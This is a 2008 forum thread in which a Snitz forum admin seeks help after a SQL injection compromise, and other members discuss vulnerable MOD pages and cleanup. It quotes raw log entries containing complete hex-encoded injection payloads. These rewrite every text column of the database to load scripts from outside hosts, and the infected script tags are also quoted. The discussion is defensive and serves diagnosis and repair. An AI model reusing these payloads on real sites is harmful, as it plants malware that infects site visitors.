| Author |
 Topic  |
|
|
richfed
Average Member
United States
999 Posts |
 Posted - 28 June 2008 : 07:10:41
|
At least according to my web host:
We have scanned your site for vulnerability and found the following pages which are vulnerable..
/messageboard/avatar_legend.asp
/messageboard/guestbook.asp
/messageboard/myowngoogle.asp
/messageboard/Photo_Album_view.asp
/messageboard/pop_report.asp
Hope that may help some of you out there.
PS - Not sure where the best place is to post this. Move as appropriate!!< |
|
|
leatherlips
Senior Member
USA
1838 Posts |
|
|
modifichicci
Average Member
Italy
787 Posts |
Posted - 28 June 2008 : 08:08:24
|
I think in Photo_album_view we have to sanitize these variables:
strPhotoName = trim(request.QueryString("PhotoName"))
strDescription = trim(request.QueryString("Description"))
strPhotoSearch = trim(request.QueryString("Photo_Search"))
I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so i don't know if a sqlstring it's enought or not.
There is a validate input function in inc photo functions but at this moment I don't know how to use it..< |
Ernia e Laparocele
Forum di Ernia e Laparocele
Acces - MySql Migration Tutorial
Adamantine forum |
 |
|
|
HuwR
Forum Admin
United Kingdom
20595 Posts |
Posted - 28 June 2008 : 08:52:31
|
I would be interested in why your host thinks all those files are vunerable, I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.
If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual succesful attempt.
obviously if they have some better evidence then fair enough< |
|
|
|
SiSL
Average Member
Turkey
671 Posts |
|
|
richfed
Average Member
United States
999 Posts |
Posted - 28 June 2008 : 10:00:19
|
quote:
Originally posted by leatherlips
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.
I wish I could answer that! I'm hoping someone can ...
Meanwhile, my host sent this:
We can see few SQL injetion attempts in the logs through the asp script topic.asp
GET /messageboard/topic.asp
topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62696E3936332E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 58.187.50.43 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
GET /messageboard/topic.asp
whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E61737073736C36332
E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E45585420
4
6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C
4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4
37572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
80 - 200.90.76.104
GET /messageboard/topic.asp
TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E6170707338342E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 190.39.125.85 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
These are found in the logs just before the first entry of the given pattern
The sql statements are encoded to Hexadecimal code ( start from: SET%20@S=CAST( . You can try to decode it using any online tools which converts Hexadecimal to string ).
If someone could make English out of this, there areprobably a few here who would be most grateful!!
< |
Edited by - richfed on 28 June 2008 10:06:09 |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 28 June 2008 : 11:14:48
|
Rich, you need to fix your forum database, anyone who visits your forum is at get risk of getting virus infected. It's amazing that after a couple days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!
Please take the forum down until is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsability in that, too.< |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
richfed
Average Member
United States
999 Posts |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
richfed
Average Member
United States
999 Posts |
Posted - 28 June 2008 : 14:27:40
|
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out????? I remove it, it just pops back in.  < |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
richfed
Average Member
United States
999 Posts |
Posted - 28 June 2008 : 15:42:24
|
| Got it removed, finally. You da man, ruirib!! Thanks ...< |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
| |
Topic |
|
Vulnerable MOD Pages ...
